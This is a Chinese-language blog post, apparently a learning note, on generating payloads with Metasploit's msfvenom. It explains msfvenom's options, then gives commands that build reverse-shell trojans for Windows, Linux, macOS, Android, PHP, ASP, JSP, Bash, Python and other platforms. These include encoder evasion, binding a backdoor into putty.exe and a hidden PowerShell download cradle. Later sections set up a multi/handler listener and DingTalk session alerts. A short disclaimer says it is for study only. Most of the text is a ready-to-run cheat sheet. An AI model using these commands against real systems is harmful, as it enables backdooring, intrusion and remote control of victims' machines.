<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>MSF初体验（三） | Maxenton</title><meta name="author" content="Maxenton"><meta name="copyright" content="Maxenton"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="MSF初体验（三）学习记录。">
<meta property="og:type" content="article">
<meta property="og:title" content="MSF初体验（三）">
<meta property="og:url" content="https://threeshui.github.io/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%89%EF%BC%89/index.html">
<meta property="og:site_name" content="Maxenton">
<meta property="og:description" content="MSF初体验（三）学习记录。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://threeshui.github.io/img/MSF01.png">
<meta property="article:published_time" content="2022-05-03T16:00:00.000Z">
<meta property="article:modified_time" content="2022-11-11T11:55:35.306Z">
<meta property="article:author" content="Maxenton">
<meta property="article:tag" content="信息安全">
<meta property="article:tag" content="工具学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://threeshui.github.io/img/MSF01.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://threeshui.github.io/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%89%EF%BC%89/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//hm.baidu.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?2ec9fa90a95a4d6f2c1057f31b412d4a";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"limitCount":50,"languages":{"author":"作者: Maxenton","link":"链接: ","source":"来源: Maxenton","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'MSF初体验（三）',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-11-11 19:55:35'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><link rel="stylesheet" href="/css/custom/custom.css"><script src="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/head.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">75</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">38</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">38</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/MSF01.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Maxenton</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">MSF初体验（三）</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-05-03T16:00:00.000Z" title="发表于 2022-05-04 00:00:00">2022-05-04</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-11-11T11:55:35.306Z" title="更新于 2022-11-11 19:55:35">2022-11-11</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E5%B7%A5%E5%85%B7%E5%AD%A6%E4%B9%A0/">工具学习</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">1.5k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>6分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="MSF初体验（三）"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p><img src="https://img-blog.csdnimg.cn/808b62bbb4ca4c579e490db5e5e3cd26.png" alt="在这里插入图片描述"><br>&#x3D;&#x3D;注意：本篇文章仅用于学习笔记记录与交流，不得用于其他违规用途。&#x3D;&#x3D;</p>
<h1 id="一、Msfvenom介绍"><a href="#一、Msfvenom介绍" class="headerlink" title="一、Msfvenom介绍"></a>一、Msfvenom介绍</h1><p>msf自带的有对应各个平台生成木马的工具msfvenom，而且不需要进入msf控制台，直接在命令行输入命令即可。<br>#		二、Msfvenom参数介绍<br>##		1、-l<br>列出指定模块的所有可用资源 , 模块类型包括 : payloads, encoders, nops, platforms, archs, encrypt, formats, all<br>##		2、-p<br>指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的</p>
<p>比如想查看windows&#x2F;meterpreter&#x2F;reverse_tcp支持什么平台、哪些选项，可以使用</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp <span class="literal">--list-options</span></span><br></pre></td></tr></table></figure>

<h2 id="3、-f"><a href="#3、-f" class="headerlink" title="3、-f"></a>3、-f</h2><p>指定输出格式 (使用  –list formats 来获取msf支持的输出格式列表)</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom  <span class="literal">--list</span> formats</span><br></pre></td></tr></table></figure>

<h2 id="4、-e"><a href="#4、-e" class="headerlink" title="4、-e"></a>4、-e</h2><p>指定需要使用的encoder（编码器）,指定需要使用的编码，如果既没用-e选项也没用-b选项，则输出raw payload如果你想查看所有支持的编码类型 , 使用</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">--list</span> encoders</span><br></pre></td></tr></table></figure>

<h2 id="5、-a"><a href="#5、-a" class="headerlink" title="5、-a"></a>5、-a</h2><p>指定payload的目标架构，例如x86 | x64 | x86_64如果你想查看所有支持的架构 , 使用</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">--list</span> archs</span><br></pre></td></tr></table></figure>

<h2 id="6、-o"><a href="#6、-o" class="headerlink" title="6、-o"></a>6、-o</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">指定创建好的payload的输出位置 , 没啥好说的</span><br></pre></td></tr></table></figure>

<h2 id="7、-b"><a href="#7、-b" class="headerlink" title="7、-b"></a>7、-b</h2><p>设定规避字符集，指定需要过滤的坏字符例 , 一般是和生成shellcode搭配使用<br>##		8、-n<br>为payload预先指定一个NOP滑动长度<br>##		9、-s<br>设定有效攻击荷载的最大长度，就是文件大小<br>##		10、-i<br>指定payload的编码次数 , 后面接次数，表示编码的次数<br>##		11、-c<br>添加自己的shellcode , 需要自己编写shellcode<br>##		12、-x|-k<br>捆绑。例如：原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。<br>##		13、-v<br>指定一个自定义的变量，以确定输出格式<br>##		14、-t<br>从STDIN读取有效负载时等待的秒数（默认值为30，0表示禁用）, 一般默认即可<br>##		15、-h<br>查看帮助信息 , 没啥好说的<br>#		三、Msfvenom生成实例<br>##		1、生成一个windows木马</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=<span class="number">192.168</span>.<span class="number">1.159</span> LPORT=<span class="number">8804</span> <span class="operator">-f</span> exe <span class="literal">-o</span> /tmp/payload.exe</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/af53de03a7504770a23c7a42311a0ed1.png" alt="在这里插入图片描述"></p>
<h2 id="2、规避指定字符"><a href="#2、规避指定字符" class="headerlink" title="2、规避指定字符"></a>2、规避指定字符</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="literal">-b</span> <span class="string">&#x27;\x00&#x27;</span> <span class="operator">-f</span> exe <span class="literal">-o</span> shell.exe</span><br><span class="line"></span><br><span class="line"><span class="literal">-b</span> 替换代码中会出现中断的字符</span><br></pre></td></tr></table></figure>

<h2 id="3、指定编码器"><a href="#3、指定编码器" class="headerlink" title="3、指定编码器"></a>3、指定编码器</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="literal">-b</span> <span class="string">&#x27;x00&#x27;</span> <span class="literal">-e</span> x86/shikata_ga_nai <span class="operator">-f</span> exe <span class="literal">-o</span> shell.exe</span><br></pre></td></tr></table></figure>

<h2 id="4、绑定后门到其他可执行程序上"><a href="#4、绑定后门到其他可执行程序上" class="headerlink" title="4、绑定后门到其他可执行程序上"></a>4、绑定后门到其他可执行程序上</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_http LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="literal">-x</span> /tmp/putty.exe <span class="literal">-k</span> <span class="operator">-f</span> exe <span class="literal">-o</span> /tmp/puuty_bind.exe</span><br></pre></td></tr></table></figure>

<h2 id="5、Windows木马"><a href="#5、Windows木马" class="headerlink" title="5、Windows木马"></a>5、Windows木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i <span class="number">3</span> –e x86/shikata_ga_nai –f exe –o /tmp/back.exe</span><br></pre></td></tr></table></figure>

<h2 id="6、Linux木马"><a href="#6、Linux木马" class="headerlink" title="6、Linux木马"></a>6、Linux木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> elf <span class="literal">-o</span> /tmp/shell.elf</span><br></pre></td></tr></table></figure>

<h2 id="7、Mac木马"><a href="#7、Mac木马" class="headerlink" title="7、Mac木马"></a>7、Mac木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> macho <span class="literal">-o</span> shell.macho</span><br></pre></td></tr></table></figure>

<h2 id="8、Android木马"><a href="#8、Android木马" class="headerlink" title="8、Android木马"></a>8、Android木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-a</span> x86 <span class="literal">--platform</span> android <span class="literal">-p</span> android/meterpreter/reverse_tcp LHOST=IP LPORT=<span class="number">8004</span> <span class="built_in">R</span>&gt; /tmppayload.apk</span><br></pre></td></tr></table></figure>

<h2 id="9、Powershell木马"><a href="#9、Powershell木马" class="headerlink" title="9、Powershell木马"></a>9、Powershell木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-a</span> x86 <span class="literal">--platform</span> Windows <span class="literal">-p</span> windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 <span class="literal">-e</span> cmd/powershell_base64 <span class="literal">-i</span> <span class="number">3</span> <span class="operator">-f</span> raw <span class="literal">-o</span> payload.ps1</span><br></pre></td></tr></table></figure>

<h2 id="10、PHP木马"><a href="#10、PHP木马" class="headerlink" title="10、PHP木马"></a>10、PHP木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> php/meterpreter_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> raw <span class="literal">-o</span> shell.php</span><br></pre></td></tr></table></figure>

<h2 id="11、ASP木马"><a href="#11、ASP木马" class="headerlink" title="11、ASP木马"></a>11、ASP木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> asp <span class="literal">-o</span> shell.asp</span><br></pre></td></tr></table></figure>

<h2 id="12、ASPX木马"><a href="#12、ASPX木马" class="headerlink" title="12、ASPX木马"></a>12、ASPX木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> aspx <span class="literal">-o</span> shell.aspx</span><br></pre></td></tr></table></figure>

<h2 id="13、JSP木马"><a href="#13、JSP木马" class="headerlink" title="13、JSP木马"></a>13、JSP木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> raw <span class="literal">-o</span> shell</span><br></pre></td></tr></table></figure>

<h2 id="14、War木马"><a href="#14、War木马" class="headerlink" title="14、War木马"></a>14、War木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> war <span class="literal">-o</span> shell.war</span><br></pre></td></tr></table></figure>

<h2 id="15、nodejs木马"><a href="#15、nodejs木马" class="headerlink" title="15、nodejs木马"></a>15、nodejs木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 <span class="operator">-f</span> raw <span class="literal">-o</span> payload.js</span><br></pre></td></tr></table></figure>

<h2 id="16、Bash木马"><a href="#16、Bash木马" class="headerlink" title="16、Bash木马"></a>16、Bash木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> cmd/unix/reverse_bash LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt;<span class="operator">-f</span> raw <span class="literal">-o</span> shell.sh</span><br></pre></td></tr></table></figure>

<h2 id="17、Perl木马"><a href="#17、Perl木马" class="headerlink" title="17、Perl木马"></a>17、Perl木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> cmd/unix/reverse_perl LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> raw <span class="literal">-o</span> shell.pl</span><br></pre></td></tr></table></figure>

<h2 id="18、Python木马"><a href="#18、Python木马" class="headerlink" title="18、Python木马"></a>18、Python木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> python/meterpreter_reverse_http LHOST=IP LPORT=<span class="number">7878</span> <span class="operator">-f</span> raw <span class="literal">-o</span> shell.py</span><br></pre></td></tr></table></figure>

<h2 id="19、ruby木马"><a href="#19、ruby木马" class="headerlink" title="19、ruby木马"></a>19、ruby木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 <span class="operator">-f</span> raw <span class="literal">-o</span> payload.rb</span><br></pre></td></tr></table></figure>

<h2 id="20、lua木马"><a href="#20、lua木马" class="headerlink" title="20、lua木马"></a>20、lua木马</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 <span class="operator">-f</span> raw <span class="literal">-o</span> payload.lua</span><br></pre></td></tr></table></figure>

<h2 id="21、exe利用exec执行powershell"><a href="#21、exe利用exec执行powershell" class="headerlink" title="21、exe利用exec执行powershell"></a>21、exe利用exec执行powershell</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/exec CMD=<span class="string">&quot;powershell.exe -nop -w hidden -c M.proxy=[Net.WebRequest]::GetSystemWebProxy();M.downloadstring(&#x27;http://IP:8080/4WFjDXrGo7Mj&#x27;);&quot;</span> <span class="operator">-f</span> exe <span class="literal">-e</span> x86/shikata_ga_nai <span class="literal">-i</span> <span class="number">6</span> <span class="literal">-o</span> msf.exe</span><br></pre></td></tr></table></figure>

<h2 id="22、windows-shellcode"><a href="#22、windows-shellcode" class="headerlink" title="22、windows shellcode"></a>22、windows shellcode</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_http LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; <span class="operator">-f</span> c</span><br><span class="line"></span><br><span class="line">msfvenom <span class="literal">-a</span> x86 <span class="literal">--platform</span> Windows <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 <span class="operator">-f</span> c</span><br></pre></td></tr></table></figure>

<h2 id="23、linux-shellcode"><a href="#23、linux-shellcode" class="headerlink" title="23、linux shellcode"></a>23、linux shellcode</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-a</span> x86 <span class="literal">--platform</span> Linux <span class="literal">-p</span> linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 <span class="operator">-f</span> c</span><br></pre></td></tr></table></figure>

<h2 id="24、mac-shellcode"><a href="#24、mac-shellcode" class="headerlink" title="24、mac shellcode"></a>24、mac shellcode</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-a</span> x86 <span class="literal">--platform</span> osx <span class="literal">-p</span> osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 <span class="operator">-f</span> c</span><br></pre></td></tr></table></figure>

<h1 id="四、MSF监听"><a href="#四、MSF监听" class="headerlink" title="四、MSF监听"></a>四、MSF监听</h1><p>当目标主机执行反弹木马后，会回连当前机器 ，需要设置端口监听</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=<span class="number">192.168</span>.<span class="number">101.48</span> LPORT=<span class="number">8000</span> <span class="operator">-f</span> exe <span class="literal">-o</span> /tmp/payload.exe</span><br><span class="line"></span><br><span class="line">msfconsole <span class="literal">-q</span></span><br><span class="line">use exploit/multi/handler</span><br><span class="line"><span class="built_in">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line"><span class="built_in">set</span> lhost IP    <span class="comment"># msf好像不支持监听本地ip , 变成0.0.0.0了</span></span><br><span class="line"><span class="built_in">set</span> lport <span class="number">4444</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h1 id="五、MSF和钉钉联动"><a href="#五、MSF和钉钉联动" class="headerlink" title="五、MSF和钉钉联动"></a>五、MSF和钉钉联动</h1><h2 id="1、创建群"><a href="#1、创建群" class="headerlink" title="1、创建群"></a>1、创建群</h2><h2 id="2、创建群机器人"><a href="#2、创建群机器人" class="headerlink" title="2、创建群机器人"></a>2、创建群机器人</h2><p><img src="https://img-blog.csdnimg.cn/cf88fc5e8a6b440484aac3d27c5b78cb.png" alt="在这里插入图片描述"><br>##	3、复制webhook<br><img src="https://img-blog.csdnimg.cn/b9d7253d6fec4ad583cc1522c0c25eef.png" alt="在这里插入图片描述"><br>##		4、msf中打开钉钉通知<br>##		5、测试<br>进入msf后</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">load <span class="literal">-l</span></span><br><span class="line">load session_notifier </span><br><span class="line">set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=你的token</span><br><span class="line">start_session_notifier</span><br><span class="line"></span><br><span class="line">常规监听，run</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/ef8cdeb905464c0e8124e78a2dd323f7.png" alt="在这里插入图片描述"><br>如果msf放后台</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">apt install screen</span><br><span class="line">screen <span class="literal">-S</span> msf                               <span class="comment"># 创建一个screen</span></span><br><span class="line">ctrl + a + d                                   <span class="comment"># 回到主窗口</span></span><br><span class="line">screen <span class="literal">-ls</span>                                      <span class="comment"># 列出所有的screen</span></span><br><span class="line">screen <span class="literal">-x</span> msf                               <span class="comment"># 恢复之前离线的screen作业</span></span><br><span class="line">screen <span class="literal">-S</span> 名字  <span class="literal">-X</span> quit                 <span class="comment">#  kill掉一个screen</span></span><br></pre></td></tr></table></figure>

<h1 id="六、RC文件"><a href="#六、RC文件" class="headerlink" title="六、RC文件"></a>六、RC文件</h1><p>如果你觉得每次 , 设置监听比较麻烦 , 你也可以将这些命令写进一个rc文件</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> handler.rc </span><br><span class="line"></span><br><span class="line">use exploit/multi/handler</span><br><span class="line"><span class="built_in">set</span> lhost <span class="number">0.0</span>.<span class="number">0.0</span></span><br><span class="line"><span class="built_in">set</span> lport <span class="number">5656</span></span><br><span class="line"><span class="built_in">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line">run <span class="literal">-j</span></span><br><span class="line"></span><br><span class="line">msfconsole <span class="literal">-r</span> handler.rc</span><br></pre></td></tr></table></figure>
<p>或者一条命令监听<br>handler -p windows&#x2F;meterpreter&#x2F;reverse_tcp -H IP -P 8899</p>
